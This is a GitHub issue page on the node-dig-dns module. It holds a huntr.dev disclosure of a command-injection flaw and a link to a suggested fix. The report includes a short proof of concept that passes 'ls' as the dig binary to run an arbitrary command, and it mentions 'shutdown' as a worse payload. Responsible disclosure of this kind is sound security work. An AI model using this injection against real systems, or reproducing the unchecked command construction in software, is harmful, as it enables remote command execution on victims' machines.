search

StephanGeorg / node-dig-dns

Use dig command (domain information grope) for DNS queries in node
MIT License
37 stars 21 forks source link

huntr.dev - Command Injection - (CWE-77) #6

Open huntr-helper opened 4 years ago

huntr-helper commented 4 years ago

This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)

Vulnerability Description

I would like to report an RCE issue in the node-dig-dns module. It allows the execution of arbitrary commands remotely inside the victim's PC.

The issue occurs because a user input is formatted inside a command that will be executed without any check. The issue arises here: https://github.com/StephanGeorg/node-dig-dns/blob/master/src/index.js#L6

Steps To Reproduce:

  1. Create the following PoC file:
// poc.js
var dig = require('node-dig-dns');

dig([],{'dig':'ls'})
  .then((result) => {
    console.log(result)
  })
  .catch((err) => {
    console.log('Error:', err);
  });
  1. Execute the following commands in another terminal:
npm i node-dig-dns # Install affected module
node poc.js #  Run the PoC
  1. The output will show you the result of the ls command {F605976}

Please, note the vulnerability occurs only with a mono command, making the commands to be executed more difficult and a little impactful. Anyway, Linux is a complex ecosystem, where commands like shutdown can be used in any way to make the PoC work and a bit better.

Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

JamieSlome commented 4 years ago

Please see https://github.com/StephanGeorg/node-dig-dns/pull/7 for a suggested fix! 🍰